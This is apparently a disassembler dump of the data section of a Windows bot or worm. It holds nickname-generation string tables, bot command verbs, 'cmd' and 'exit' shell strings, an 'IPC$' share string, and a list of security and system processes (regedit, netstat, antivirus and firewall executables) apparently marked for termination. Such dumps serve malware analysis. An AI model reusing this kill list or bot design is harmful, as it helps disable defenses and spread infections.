dd offset aA ; "a"
dd offset aS_5 ; "s"
dd offset aD_0 ; "d"
dd offset aF_1 ; "f"
dd offset aG_0 ; "g"
dd offset asc_437920 ; "h"
dd offset aJ ; "j"
dd offset aK ; "k"
dd offset asc_42FA20 ; "l"
dd offset aZ_0 ; "z"
dd offset asc_437918 ; "x"
dd offset aC ; "c"
dd offset aV ; "v"
dd offset aB_0 ; "b"
dd offset aN ; "n"
dd offset aM_0 ; "m"
dd offset aQ_0 ; "Q"
dd offset aW ; "W"
dd offset aE_0 ; "E"
dd offset aR_0 ; "R"
dd offset aT_0 ; "T"
dd offset aY ; "Y"
dd offset aU_0 ; "U"
dd offset aI_0 ; "I"
dd offset aO_0 ; "O"
dd offset aP_0 ; "P"
dd offset aA_0 ; "A"
dd offset aS_10 ; "S"
dd offset aD_2 ; "D"
dd offset aF_0 ; "F"
dd offset aG ; "G"
dd offset asc_4378DC ; "H"
dd offset aJ_0 ; "J"
dd offset aK_0 ; "K"
dd offset asc_4378D0 ; "L"
dd offset aZ ; "Z"
dd offset asc_4378C8 ; "X"
dd offset aC_3 ; "C"
dd offset aV_0 ; "V"
dd offset aB ; "B"
dd offset aN_0 ; "N"
dd offset aM_1 ; "M"
dd offset aSmartmir ; "SMARTMIR"
dd offset aFarooq ; "farooq"
dd offset aMaxxguy ; "maxxguy"
dd offset aBobmarley ; "BOBMARLEY"
dd offset aEmilya ; "emilya"
dd offset aKrizha ; "KRIZHA"
dd offset aCar1nna ; "Car1nna"
dd offset aSwin ; "swin"
dd offset aMale ; "male"
dd offset aKoko ; "koko"
dd offset aFlexster ; "flexster"
dd offset aKen ; "ken"
dd offset aShez ; "Shez"
dd offset aTalika ; "talika"
dd offset aMarcy ; "marcy"
dd offset aCme ; "cme"
dd offset aHeval ; "heval"
dd offset aBunty ; "bunty"
dd offset aJanno ; "janno"
dd offset aRimpy ; "rimpy"
dd offset aNastysha ; "nastysha"
dd offset aLuisa ; "Luisa"
dd offset aTroller ; "troller"
dd offset aManee ; "manee"
dd offset aKermit ; "kermit"
dd offset aPuregold ; "puregold"
dd offset aCoredump ; "CoreDump"
dd offset aImra ; "imra"
dd offset aGirl_0 ; "GirL"
dd offset aCamel ; "CAMEL"
dd offset aReshma ; "reshma"
dd offset aKencing ; "Kencing"
dd offset aThr45h3r5 ; "THR45H3R5"
dd offset aCansuuuu ; "cansuuuu"
dd offset aKaan38dent ; "kaan38dent"
dd offset aErkan27 ; "erkan27"
dd offset aHexaaa ; "hexaaa"
dd offset aBerk19 ; "berk19"
dd offset aObenibisevse ; "OBeNiBiSeVSe"
dd offset aIrmal ; "irmal"
dd offset aMisssunday ; "misssunday"
dd offset aTolga34 ; "Tolga34"
dd offset aJericho ; "JERICHO"
dd offset aMary_0 ; "MARY"
dd offset aAkin ; "AKIN"
dd offset aMelekk ; "melekk"
dd offset aTrend3 ; "trend3"
dd offset aMERVE ; "M-E-R-V-E"
dd offset aTekir ; "tekir"
dd offset aVenedik34 ; "venedik34"
dd offset aSevmekmi ; "sevmekmi"
dd offset aSudenur ; "SUDENUR"
dd offset aArzu ; "ARZU"
dd offset aHaticem ; "haticem"
dd offset aErnesto ; "ERNESTO"
dd offset aAslii ; "aslii"
dd offset aPiramit ; "PIRAMIT"
dd offset aSamyeli21 ; "samyeli21"
dd offset aRetg ; "RETG"
dd offset aBlackpearl ; "blackpearl"
dd offset aPelincik ; "pelincik"
dd offset aAhmet ; "ahmet"
dd offset aTurkyy ; "turkyy"
dd offset aAnk32m ; "ank32m"
dd offset aZack ; "ZACK"
dd offset aIzmir39m ; "Izmir39m"
dd offset aAlbina ; "albina"
dd offset aAyla ; "AYLA-"
dd offset off_43764C
dd offset aAnkh ; "ankh"
dd offset aDonjuanm ; "Donjuanm"
dd offset aBogac ; "bogac"
dd offset aAlpay34m ; "alpay34m"
dd offset aCongueror ; "CoNGuERoR"
dd offset aDenizlim ; "DenizliM"
dd offset aBerk19m ; "Berk19m"
dd offset aDevran ; "devran"
dd offset aArda ; "arda"
dd offset aKeyiflisert ; "keyifliSERT"
dd offset aMurat34M ; "murat34-m"
dd offset aHakan3 ; "hakan3"
dd offset aImirzali ; "IMIRZALI--"
dd offset aRamtha ; "RAMTHA"
dd offset aEmre ; "Emre--"
dd offset aElmaazyok ; "elmaazyok"
dd offset aEsmerkiz ; "Esmerkiz"
dd offset aKebikec ; "kebikec"
dd offset aFlord ; "FLoRD"
dd offset aHoly ; "holy"
dd offset aMahinur ; "MAHINUR"
dd offset aSadikaellesme ; "SaDIkaEllesme"
dd offset aAykut1 ; "aykut1"
dd offset aKashmira ; "Kashmira"
dd offset aSeviseli ; "SeViSeLi"
dd offset aSugarboy ; "SUGARBOY-"
dd offset aUzgun36 ; "uzgun36"
dd offset aKumul ; "kumul"
dd offset aAdalim ; "ADALIM"
dd offset aUmut ; "umut-"
dd offset aAnk32M ; "ANK-32-M"
dd offset aDjspace ; "DJSPACE"
dd offset aAnkar ; "Ankar"
dd offset aFenerlee ; "FeNeRLee"
dd offset aHayran ; "hayran"
dd offset aAngelgirl ; "angelgirl"
dd offset aKapk ; "kapk"
dd offset aAchilles ; "Achilles"
dd offset aTegmen ; "TEGMEN"
dd offset aKotan ; "kotan"
dd offset aSevda ; "sevda"
dd offset off_4374B8
dd offset aAlcatras ; "alcatras"
dd offset aA44m ; "a44m"
dd offset aBirsen ; "birsen"
dd offset aYabanc ; "yabanc"
dd offset aDevre ; "devre"
dd offset aErkan ; "erkan"
dd offset aAnkm ; "ankM"
dd offset aAdem28 ; "Adem28"
dd offset aMaxsilla ; "maxsilla"
dd offset aM41ist ; "M41IST"
dd offset aAdamm33 ; "AdAMM33"
dd offset aFirtina ; "firtina"
dd offset aAta29 ; "Ata29"
dd offset aKoray ; "KORAY"
dd offset aAkden ; "akden"
dd offset aIzmirlm ; "izmirlm"
dd offset aUla ; "ula"
dd offset aNeHaber ; "NE-HABER"
dd offset aPassenger ; "passenger"
dd offset aTropikal ; "tropikal"
dd offset aCool30m ; "cool30m"
dd offset aCem39 ; "cem39"
dd offset aRerpjj ; "RERPJJ"
dd offset aTeoman ; "TEOMAN```"
dd offset aDallas43m ; "DALLAS43M"
dd offset aPrometheus ; "prometheus"
dd offset aMaveRIck ; "MaVe{R}icK"
dd offset aAdamm ; "ADAMM"
dd offset aCumhur29 ; "cumhur29"
dd offset aWantedlove ; "WANTEDLOVE"
off_4431D8 dd offset aSex ; DATA XREF: sub_41A293+41�r
; sub_41A293+EB�r
; "sex"
dd offset aLez ; "lez"
dd offset aZex ; "zex"
dd offset aTree ; "tree"
dd offset aBad ; "bad"
dd offset aLag ; "lag"
dd offset aTambe ; "|tambe|"
dd offset aWoh ; "|woh|"
dd offset aTot_0 ; "-|tot|"
dd offset aSuck ; "|suck|"
dd offset aLuck ; "|luck|"
dd offset aHub ; "{hub}"
dd offset aSex_0 ; "{sex}"
dd offset aGens ; "{gens|"
dd offset aLuvuF ; "||luvu-f|"
dd offset aWiked ; "|wiked|"
dd offset aSick ; "sick}}"
dd offset aQ8 ; "Q8"
dd offset aQ8A ; "|q8|a"
dd offset aB_0 ; "b"
dd offset aC ; "c"
dd offset aD_0 ; "d"
dd offset aE ; "e"
dd offset aF_1 ; "f"
dd offset aG_0 ; "g"
dd offset asc_437920 ; "h"
dd offset aI ; "i"
dd offset a_ ; "_"
dd offset aJ ; "j"
dd offset aK ; "k"
dd offset asc_42FA20 ; "l"
dd offset aM_0 ; "m"
dd offset aN ; "n"
dd offset aO ; "o"
dd offset aP ; "p"
dd offset aQ ; "q"
dd offset aRs ; "rs"
dd offset aT ; "t"
dd offset aU ; "u"
dd offset aV ; "v"
dd offset aW_0 ; "w"
dd offset asc_437918 ; "x"
dd offset aY_0 ; "y"
dd offset aZ_0 ; "z"
dd offset aHappy ; "happy"
dd offset aRg ; "rg"
dd offset aTy ; "ty"
dd offset aGf ; "gf"
dd offset aRt ; "rt"
dd offset aSdf ; "sdf"
dd offset aUi ; "ui"
dd offset aLuvy ; "luvy"
dd offset aTrimy ; "trimy"
dd offset aTruck ; "truck"
dd offset aMuckc ; "muckc"
dd offset aZ_0 ; "z"
dd offset aG_0 ; "g"
dd offset aS_5 ; "s"
dd offset aQ ; "q"
dd offset off_4372D8
dd offset aBbl ; "|bbl"
dd offset byte_42B633
dd offset byte_42B633
dd offset a___0 ; "_|_"
dd offset byte_42B633
dd offset byte_42B633
dd offset byte_42B633
dd offset byte_42B633
dd offset aF_0 ; "F"
dd offset aM_1 ; "M"
dd offset aLuvu ; "LUVU"
dd offset aSad ; "Sad"
dd offset aF ; "^^^f^"
dd offset aB_0 ; "b"
dd offset byte_42B633
dd offset aSleeping ; "Sleeping"
dd offset byte_42B633
dd offset byte_42B633
dd offset aFuck_0 ; "Fuck"
dd offset aFree ; "Free"
dd offset byte_42B633
dd offset byte_42B633
dd offset asc_4378C8 ; "X"
dd offset byte_42B633
dd offset aBoy ; "BOY"
dd offset aGirl ; "GIRL"
dd offset aGurl ; "gurl"
dd offset aShit ; "shit"
dd offset aAha ; "aha"
dd offset aYeah ; "yeah"
dd offset aMuha ; "muha"
dd offset aMof0 ; "mof0"
dd offset aMofo ; "mofo"
dd offset aTot ; "tot"
dd offset aLol ; "lol"
dd offset aLoloA ; "lolo|a|"
dd offset aSex4free ; "|sex4free|"
dd offset a4us ; "|4us|"
dd offset a4you ; "{4you}"
dd offset dword_4371F0+38h
dd offset dword_4371F0+34h
dd offset dword_4371F0+30h
dword_443370 dd 30B0005h, 10h, 48h, 1, 16D016D0h, 0 ; DATA XREF: sub_41AA0A+A6�o
dd 1, 10000h, 0AFA8BD80h, 11C97D8Ah, 8F4BEh, 8929102Bh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_4433BC dd 3000005h, 10h, 18h, 1, 3 dup(0) ; DATA XREF: sub_41AA0A+E5�o
dword_4433D8 dd 975201B0h, 11D059CAh, 0A000D5A8h, 51800DC9h, 0
; DATA XREF: sub_41AA0A+11A�o
dword_4433EC dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 0
; DATA XREF: sub_41AA0A+141�o
off_443400 dd offset aAdd ; DATA XREF: sub_41BF46+59�r
; sub_41BFBE+4A�r ...
; "Add"
off_443404 dd offset aAdded ; DATA XREF: sub_41BF46+2D�r
; sub_41BFBE+7C�r ...
; "Added"
dword_443408 dd 0 ; DATA XREF: sub_41BF46+18�r
dd offset aDelete_0 ; "Delete"
dd offset aDeleted ; "Deleted"
align 8
dd offset aList_1 ; "List"
dd offset aListed ; "Listed"
dd 0
dd offset aStart_0 ; "Start"
dd offset aStarted ; "Started"
align 10h
dd offset aStop_0 ; "Stop"
dd offset aStopped_0 ; "Stopped"
dd 1, 437B98h, 437B90h, 2, 437B84h, 437B78h, 3, 0
dd 7530h, 0
off_443460 dd offset aRegedit_exe ; DATA XREF: sub_41C444:loc_41C50C�r
; "regedit.exe"
dd offset aMsconfig_exe ; "msconfig.exe"
dd offset aNetstat_exe ; "netstat.exe"
dd offset aMsblast_exe_0 ; "msblast.exe"
dd offset aZapro_exe ; "zapro.exe"
dd offset aNavw32_exe ; "navw32.exe"
dd offset aNavapw32_exe ; "navapw32.exe"
dd offset aZonealarm_exe ; "zonealarm.exe"
dd offset aWincfg32_exeta ; "wincfg32.exetaskmon.exe"
dd offset aPandaavengine_ ; "PandaAVEngine.exe"
dd offset aSysinfo_exe ; "sysinfo.exe"
dd offset aMscvb32_exe ; "mscvb32.exe"
dd offset aMsblast_exe ; "MSBLAST.exe"
dd offset aTeekids_exe ; "teekids.exe"
dd offset aPenis32_exe ; "Penis32.exe"
dd offset aBbeagle_exe ; "bbeagle.exe"
dd offset aSysmonxp_exe ; "SysMonXP.exe"
dd offset aWinupd_exe ; "winupd.exe"
dd offset aWinsys_exe ; "winsys.exe"
dd offset aSsate_exe ; "ssate.exe"
dd offset aRate_exe ; "rate.exe"
dd offset aD3dupdate_exe ; "d3dupdate.exe"
dd offset aIrun4_exe ; "irun4.exe"
dd offset aI11r54n4_exe ; "i11r54n4.exe"
off_4434C0 dd offset aIpc ; DATA XREF: seg000:loc_41CD3E�r
; seg000:0041CD4C�r ...
; "IPC$"
dword_4434C4 dd 0 ; DATA XREF: seg000:loc_41D02C�r
dd offset dword_438B08+10h
align 10h
dd offset dword_438B08+0Ch
dd offset dword_438B08+8
dd offset dword_438B08+4
dd offset dword_438B08
byte_4434E0 db 63h ; DATA XREF: seg000:0041DF27�o
; seg000:0041DF41�r ...
db 6Dh, 64h, 0
aExit db 'exit',0 ; DATA XREF: seg000:0041E0A2�o
; seg000:0041E0B7�r
align 10h
dword_4434F0 dd 6B0Eh ; DATA XREF: sub_41ECD4+4�w sub_41ECDE�r ...
align 10h
dd offset dword_4E2F20
align 8
dd offset dword_4E2F20
dd 101h, 0FFFFFFFFh, 0
dd 1000h, 0
dword_443520 dd 3 dup(0) ; DATA XREF: sub_40E3B2+17C�o
; sub_422124+53�o ...
dd 2, 0FFFFFFFFh, 3 dup(0)
dword_443540 dd 3 dup(0) ; DATA XREF: sub_422124+5B�o
; sub_422C6E:loc_422C8C�o
dd 2, 0FFFFFFFFh, 8Bh dup(0)
dd 9875h, 9873h
off_443788 dd offset sub_41FE1A ; DATA XREF: sub_41F146�r
dd offset byte_41FDE1
dd offset byte_41FDE1
dword_443794 dd 19930520h, 3 dup(0) ; DATA XREF: sub_420341+2�o
; sub_42034A+2�o
dd offset dword_42555C
align 10h
dword_4437B0 dd 1 ; DATA XREF: sub_40F87A+68�r
; sub_41EAB4:loc_41EAC7�r ...
byte_4437B4 db 2Eh ; DATA XREF: sub_423327:loc_423747�r
; sub_423327+447�r ...
align 4
dd 1, 0
off_4437C0 dd offset sub_41F282 ; DATA XREF: sub_420CE8+1C�r
dword_4437C4 dd 2 ; DATA XREF: sub_426069+58�r
; sub_4261E0+E�r ...
dd 10h
off_4437CC dd offset aNull ; DATA XREF: sub_4222C8:loc_4226C0�r
; sub_4222C8+51C�r
; "(null)"
off_4437D0 dd offset aNull_0 ; DATA XREF: sub_4222C8+2D8�r
; "(null)"
dword_4437D4 dd 878D59B4h ; DATA XREF: sub_41E7B2+6�r
; sub_41FFBA+2D�r ...
off_4437D8 dd offset asc_439660 ; DATA XREF: sub_41EAB4:loc_41EADF�r
; sub_41EAB4:loc_41EB74�r ...
; " ((((( H"
off_4437DC dd offset word_439862 ; DATA XREF: sub_429DD7+18�r
dword_4437E0 dd 1 ; DATA XREF: sub_422C0F:loc_422C1A�r
dword_4437E4 dd 16h ; DATA XREF: sub_422C0F:loc_422C3E�r
dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
byte_443948 db 1 ; DATA XREF: sub_422F16+120�r
db 2, 4, 8
align 10h
dword_443950 dd 3A4h ; DATA XREF: sub_422F16:loc_422F91�r
dword_443954 dd 82798260h ; DATA XREF: sub_422F16+15C�r
dd 21h, 0
dword_443960 dd 0DFA6h ; DATA XREF: sub_422F16+100�r
align 8
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_443A40 dd 0FFFFFFFFh, 0A80h ; DATA XREF: sub_421C63:loc_421CE6�o
; sub_422124:loc_4221E1�o
off_443A48 dd offset sub_427274 ; DATA XREF: sub_424391+11A�r
; sub_424391+1D5�r ...
dword_443A4C dd 173Fh ; DATA XREF: sub_424720+D�r
off_443A50 dd offset sub_424B83 ; DATA XREF: sub_41FDE2+5�w
; sub_4222C8+476�r
off_443A54 dd offset sub_42484B ; DATA XREF: sub_41FDE2+A�w
; sub_4222C8+4A2�r
off_443A58 dd offset sub_4248B0 ; DATA XREF: sub_41FDE2+14�w
; sub_423327+5B5�r
off_443A5C dd offset sub_4247F3 ; DATA XREF: sub_41FDE2+1E�w
; sub_4222C8+491�r
off_443A60 dd offset word_424896 ; DATA XREF: sub_41FDE2+28�w
off_443A64 dd offset sub_424B83 ; DATA XREF: sub_41FDE2+32�w
dd offset dword_42555C
dd offset sub_4254B5
off_443A70 dd offset sub_4254B5 ; DATA XREF: sub_4254E2+C�r
align 10h
dword_443A80 dd 1B3Fh ; DATA XREF: sub_4255CA+D�r
dword_443A84 dd 1 ; DATA XREF: sub_420B27+18�r
dword_443A88 dd 2 ; DATA XREF: sub_426069:loc_42608F�r
; sub_426069+3A�r
off_443A8C dd offset aR6002FloatingP ; DATA XREF: sub_426069+D5�r
; sub_426069+112�r ...
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 439F9Ch, 9, 439F70h, 0Ah, 439ED8h, 10h, 439EACh
dd 11h, 439E7Ch, 12h, 439E58h, 13h, 439E2Ch, 18h, 439DF4h
dd 19h, 439DCCh, 1Ah, 439D94h, 1Bh, 439D5Ch, 1Ch, 439D34h
dd 1Dh, 439C90h, 78h, 439C7Ch, 79h, 439C6Ch, 7Ah, 439C5Ch
dd 0FCh, 4348E8h, 0FFh, 439C4Ch
dword_443B20 dd 0C0000005h, 0Bh, 0 ; DATA XREF: seg000:00426225�o
; sub_429276+6�o
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
dd 0C000008Dh, 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
dd 0C0000090h, 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_443B98 dd 3 ; DATA XREF: seg000:0042629D�r
; sub_4292AF+C4�r
dword_443B9C dd 7 ; DATA XREF: seg000:004262A2�r
; sub_4292AF+C9�r
dword_443BA0 dd 0Ah ; DATA XREF: seg000:0042621F�r
; sub_429276�r
dword_443BA4 dd 8Ch ; DATA XREF: seg000:004262CB�r
; seg000:004262D3�w ...
dword_443BA8 dd 2694h ; DATA XREF: sub_427833+3�r
; sub_427885+5D�r
align 10h
dword_443BB0 dd 14h ; DATA XREF: sub_427793:loc_42779B�r
off_443BB4 dd offset aExp ; DATA XREF: sub_427793:loc_42780D�r
; "exp"
dd 1Dh, 439B38h, 1Ah, 42F530h, 1Bh, 439B3Ch, 1Fh, 43A2A0h
dd 13h, 43A298h, 21h, 43A290h, 0Eh, 43A288h, 0Dh, 43A280h
dd 0Fh, 439B00h, 10h, 43A278h, 5, 43A270h, 1Eh, 43A26Ch
dd 12h, 43A268h, 20h, 43A264h, 0Ch, 439B08h, 0Bh, 439B10h
dd 15h, 43A25Ch, 1Ch, 439B18h, 19h, 43A254h, 11h, 43A24Ch
dd 18h, 43A244h, 16h, 43A23Ch, 17h, 43A234h, 22h, 43A230h
dd 23h, 43A22Ch, 24h, 43A228h, 25h, 43A220h, 26h, 43A214h
dbl_443C98 dq 1.797693134862316e308 ; DATA XREF: sub_42751C+BC�r
; sub_42751C:loc_42760A�r ...
dd 0
dd 0FFF80000h
dbl_443CA8 dq 1.797693134862316e308 ; DATA XREF: sub_42751C+93�r
; sub_42751C:loc_4275E0�r ...
dd 0
dd 100000h, 0
dd 80000000h
tbyte_443CC0 dt 2.3562723457267347066e313 ; DATA XREF: sub_427ACA+B�r
; sub_427ACA+1E�r
align 4
tbyte_443CCC dt 1.9149954921904370718e-1233 ; DATA XREF: sub_427ACA+30�r
align 4
dword_443CD8 dd 400h, 0FFFFFC01h, 35h, 0Bh, 40h, 3FFh ; DATA XREF: sub_427E18�o
dword_443CF0 dd 80h, 0FFFFFF81h, 18h, 8, 20h, 7Fh ; DATA XREF: sub_427E2E�o
dword_443D08 dd 2 dup(0) ; DATA XREF: sub_42968C+C�o
dd 4002A000h, 2 dup(0)
dd 4005C800h, 2 dup(0)
dd 4008FA00h, 2 dup(0)
dd 400C9C40h, 2 dup(0)
dd 400FC350h, 2 dup(0)
dd 4012F424h, 0
dd 80000000h, 40169896h, 0
dd 20000000h, 4019BEBCh, 0
dd 0C9BF0400h, 40348E1Bh, 0A1000000h, 1BCECCEDh, 404ED3C2h
dd 0B59EF020h, 0ADA82B70h, 40699DC5h, 25FD5DD0h, 4F8E1AE5h
dd 4083EB19h, 95D79671h, 8D050E43h, 409EAF29h, 44A0BFF9h
dd 8F1281EDh, 40B98281h, 0A6D53CBFh, 1F49FFCFh, 40D3C278h
dd 8CE0C66Fh, 47C980E9h, 41A893BAh, 556B85BCh, 0F78D3927h
dd 427CE070h, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h
dd 2F29F2CCh, 44268184h, 0AA171028h, 0E310AEF8h, 44FAC4C5h
dd 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h, 0A0AEA60Eh
dd 46A3E319h, 0C17650Dh, 75868175h, 4D48C976h, 0A7E44258h
dd 353B3993h, 53EDB2B8h, 5DE5A74Dh, 3B5DC53Dh, 5A929E8Bh
dd 0F0A65DFFh, 54C020A1h, 61378CA5h, 5A8BFDD1h, 5D25D88Bh
dd 67DBF989h, 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch
dd 52028A20h, 7525C460h, 0
dword_443E68 dd 0CCCDCCCDh, 0CCCCCCCCh, 3FFBCCCCh, 0D70A3D71h, 0A3D70A3h
; DATA XREF: sub_42968C+23�o
dd 3FF8A3D7h, 0DF3B645Ah, 6E978D4Fh, 3FF58312h, 652CD3C3h
dd 1758E219h, 3FF1D1B7h, 84230FD0h, 0AC471B47h, 3FEEA7C5h
dd 69B6A640h, 0BD05AF6Ch, 3FEB8637h, 42BC3D33h, 94D5E57Ah
dd 3FE7D6BFh, 0CEFDFDC2h, 77118461h, 3FE4ABCCh, 0E15B4C2Fh
dd 94BEC44Dh, 3FC9E695h, 3B53C492h, 14CD4475h, 3FAF9ABEh
dd 94BA67DEh, 1EAD4539h, 3F94CFB1h, 0E2C62324h, 313BBABCh
dd 3F7A8B61h, 0C1595561h, 7C53B17Eh, 3F5FBB12h, 8D2FEED7h
dd 8592BE06h, 3F44FB15h, 0E9A53F24h, 0EA27A539h, 3F2AA87Fh
dd 0E4A1AC7Dh, 467C64BCh, 3E55DDD0h, 0CC067B63h, 83775423h
dd 3D8191FFh, 193AFA91h, 4325637Ah, 3CACC031h, 38D18921h
dd 0B8974782h, 3BD7FD00h, 85888DCh, 0E3E8B11Bh, 3B03A686h
dd 424584C6h, 7599B607h, 3A2EDB37h, 0D21C7133h, 0EE32DB23h
dd 395A9049h, 0C0BE87A6h, 82A5DA57h, 32B5A2A6h, 11B268E2h
dd 449F52A7h, 2C10B759h, 2DE44925h, 534F3436h, 256BCEAEh
dd 0A404598Fh, 7DC2DEC0h, 1EC6E8FBh, 5A88E79Eh, 0BF3C9157h
dd 18228350h, 62654B4Eh, 0AF8F83FDh, 117D9406h, 9FDE2DE4h
dd 4C8D2CEh, 0AD8A6DDh
off_443FC4 dd offset off_43A388 ; DATA XREF: seg001:0043A588�o
; seg001:0043A6E8�o
dd 0
a_?avexception@ db '.?AVexception@@',0
off_443FDC dd offset off_43A388 ; DATA XREF: seg001:off_43A440�o
; seg001:0043A480�o ...
dd 0
a_?avlogic_erro db '.?AVlogic_error@std@@',0
align 4
off_443FFC dd offset off_43A388 ; DATA XREF: seg001:off_43A488�o
; seg001:0043A4CC�o ...
dd 0
a_?avlength_err db '.?AVlength_error@std@@',0
align 4
off_44401C dd offset off_43A388 ; DATA XREF: seg001:off_43A4D4�o
; seg001:0043A518�o ...
dd 0
a_?avout_of_ran db '.?AVout_of_range@std@@',0
align 4
off_44403C dd offset off_43A388 ; DATA XREF: seg001:off_43A520�o
; seg001:0043A55C�o
dd 0
a_?avtype_info@ db '.?AVtype_info@@',0
align 10h
dword_444060 dd 0 ; DATA XREF: seg000:004011D7�o
dword_444064 dd 71AB5690h ; DATA XREF: sub_4012D6+61D�w
; sub_4012D6+76C�r ...
dword_444068 dd 71AB157Eh ; DATA XREF: sub_4012D6+678�w
; sub_4012D6+7A4�r ...
dword_44406C dd 71C574FAh ; DATA XREF: sub_4012D6+9BE�w
; sub_4012D6+A33�r ...
dword_444070 dd 7620E8C3h ; DATA XREF: sub_4012D6+859�w
; sub_4012D6+8AC�r
dword_444074 dd 71AB5A01h ; DATA XREF: sub_4012D6+540�w
; sub_4012D6+6C4�r ...
dword_444078 dd 762211EFh ; DATA XREF: sub_4012D6+7FE�w
; sub_4012D6+86D�r
dword_44407C dd 77E6C0E3h ; DATA XREF: sub_4012D6+8C�w
; sub_4012D6+E2�r ...
dword_444080 dd 77D5E303h ; DATA XREF: sub_4012D6+1A6�w
; sub_4012D6+1E2�r ...
dword_444084 dd 77D45B19h ; DATA XREF: sub_4012D6+172�w
; sub_4012D6+1C2�r ...
dword_444088 dd 71AB1444h ; DATA XREF: sub_4012D6+624�w
; sub_4012D6+774�r
dword_44408C dd 77C71BB0h ; DATA XREF: sub_4012D6+48D�w
; sub_4012D6+4DB�r ...
dword_444090 dd 71B28D0Dh ; DATA XREF: sub_4012D6+B50�w
; sub_40C979+A3�r
dword_444094 dd 71AB155Ah ; DATA XREF: sub_4012D6+59B�w
; sub_4012D6+70C�r ...
dword_444098 dd 7620AFB6h ; DATA XREF: sub_4012D6+83F�w
; sub_4012D6+873�r
dword_44409C dd 77D5E310h ; DATA XREF: sub_4012D6+18C�w
; sub_4012D6+1D2�r ...
dword_4440A0 dd 77D4932Ch ; DATA XREF: sub_4012D6+206�w
; sub_4012D6+227�r
dword_4440A4 dd 77EBA6E9h ; DATA XREF: sub_4012D6+58�w
; sub_4012D6+CA�r ...
dword_4440A8 dd 71C4A1B4h ; DATA XREF: sub_4012D6+9A4�w
; sub_4012D6+A23�r ...
dword_4440AC dd 71AB3E5Dh ; DATA XREF: sub_4012D6+5A8�w
; sub_4012D6+718�r ...
dword_4440B0 dd 77D5C13Ah ; DATA XREF: sub_4012D6+220�w
; sub_4012D6+23C�r
dword_4440B4 dd 1F7BA3A9h ; DATA XREF: sub_4012D6+BF4�w
; sub_4012D6+C2F�r
dword_4440B8 dd 77DD23D7h ; DATA XREF: sub_4012D6+2A5�w
; sub_4012D6+2F0�r ...
dword_4440BC dd 71AB868Dh ; DATA XREF: sub_4012D6+65E�w
; sub_4012D6+794�r ...
dword_4440C0 dd 77D4456Bh ; DATA XREF: sub_4012D6+22D�w
dword_4440C4 dd 1F7B9D96h ; DATA XREF: sub_4012D6+C28�w
dword_4440C8 dd 71C4502Ch ; DATA XREF: sub_4012D6+9CB�w
; sub_4012D6+A3B�r ...
dword_4440CC dd 71AB1ED3h ; DATA XREF: sub_4012D6+610�w
; sub_4012D6+764�r ...
dword_4440D0 dd 773F97B0h ; DATA XREF: sub_4012D6+BAA�w
dword_4440D4 dd 77E78C17h ; DATA XREF: sub_4012D6+31�w
; sub_4012D6+AD�r ...
dword_4440D8 dd 71B2A381h ; DATA XREF: sub_4012D6+B43�w
; sub_4012D6+B5F�r ...
dword_4440DC dd 71C21CA3h ; DATA XREF: sub_4012D6+A0C�w
; sub_40F87A+8B�r ...
dword_4440E0 dd 71C453F8h ; DATA XREF: sub_4012D6+9E5�w
; sub_4012D6+A4B�r ...
dword_4440E4 dd 77DD59F0h ; DATA XREF: sub_401000+49�r
; sub_4012D6+298�w ...
dword_4440E8 dd 71C2498Bh ; DATA XREF: sub_4012D6+97D�w
; sub_4012D6+A06�r ...
dword_4440EC dd 71C4576Ch ; DATA XREF: sub_4012D6+9F2�w
; sub_4012D6+A53�r ...
dword_4440F0 dd 77EBB1E7h ; DATA XREF: sub_4012D6+3E�w
; sub_4012D6+BA�r ...
dword_4440F4 dd 77E2C1B3h ; DATA XREF: sub_4012D6+399�w
; sub_4012D6+3DF�r ...
dword_4440F8 dd 77D49A11h ; DATA XREF: sub_4012D6+17F�w
; sub_4012D6+1CA�r ...
dword_4440FC dd 77E686CCh ; DATA XREF: sub_4012D6+72�w
; sub_4012D6+D2�r ...
dword_444100 dd 71AB3C22h ; DATA XREF: sub_4012D6+58E�w
; sub_4012D6+700�r ...
dword_444104 dd 71C24870h ; DATA XREF: sub_4012D6+98A�w
; sub_4012D6+A13�r ...
dword_444108 dd 76214750h ; DATA XREF: sub_4012D6+84C�w
; sub_4012D6+8A4�r
dword_44410C dd 76D674FAh ; DATA XREF: sub_4012D6+ADF�w
; sub_4012D6+AE6�r ...
dword_444110 dd 71AB41DAh ; DATA XREF: sub_4012D6+533�w
; sub_4012D6+6B3�r ...
dword_444114 dd 71C3516Ah ; DATA XREF: sub_4012D6+9FF�w
; sub_4012D6+A5B�r ...
dword_444118 dd 77EBA994h ; DATA XREF: sub_4012D6+65�w
; sub_41C444+158�r
